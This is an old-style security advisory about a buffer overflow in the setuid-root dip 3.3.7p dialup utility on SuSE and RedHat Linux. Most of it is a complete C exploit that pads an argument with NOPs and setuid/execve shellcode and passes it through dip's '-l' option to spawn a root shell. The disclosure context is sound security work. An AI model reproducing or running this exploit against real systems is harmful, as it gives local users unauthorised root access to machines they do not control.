COMMAND

    dip

SYSTEMS AFFECTED

    dip 3.3.7p

PROBLEM

    'sebi hegi'  found following.   After doing  a check  on his  SuSE
    linux 7.0 x86 he found something interesting:

        hegi@faust:~ > ls -la /usr/sbin/dip
        -rwsr-xr--   1 root     dialout     62056 Jul 29  2000 /usr/sbin/dip

        DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
        Written by Fred N. van Kempen, MicroWalt Corporation.

    Looks  like  this  version  is  still  vulnerable although it went
    public in 1998.   It's not world  executable but still  a security
    risk on SuSE 7.0.   And we are wondering  why at least SuSE  still
    shippes a product with a known vulnerability.

    /* Linux x86 dip 3.3.7p exploit by pr10n */
    
    
    #include <stdio.h>
    
    #define NOP 0x90
    
    
    /*thanks to hack.co.za*/
    char shellcode[] =
              "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
              "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
              "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
              "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
    
    
    
    unsigned long get_sp(void){ __asm__("movl %esp, %eax");}
    
    main(int argc, char *argv[]){
    
    char buf[136];
    int i;
    int offset=0,*ptr;
    long ret;
    
    
    if(argc!=2){
    printf("usage: %s offset\n",argv[0]);
    exit(0);}
    
    offset=atoi(argv[1]);
    
    ret=(get_sp()-offset);
    
    for(i=1;i<136;i+=4){
    *(long *)&buf[i]=ret;}
    
    printf("\nusing: 0x%x\n\n",ret);
    
    for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
    buf[i]=NOP;
    
    memcpy(buf+i,shellcode,strlen(shellcode));
    
    execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);
    
    
    }

    The same packet and problem is  on SuSe 7.1 and RedHat 6.2.   SuSE
    6.2  and  6.3  are  also  vulnerable  and setuid root.  But normal
    users, just like  on SuSE 7.0,  don't have execute  permissions on
    these versions.

SOLUTION

    Nothing yet.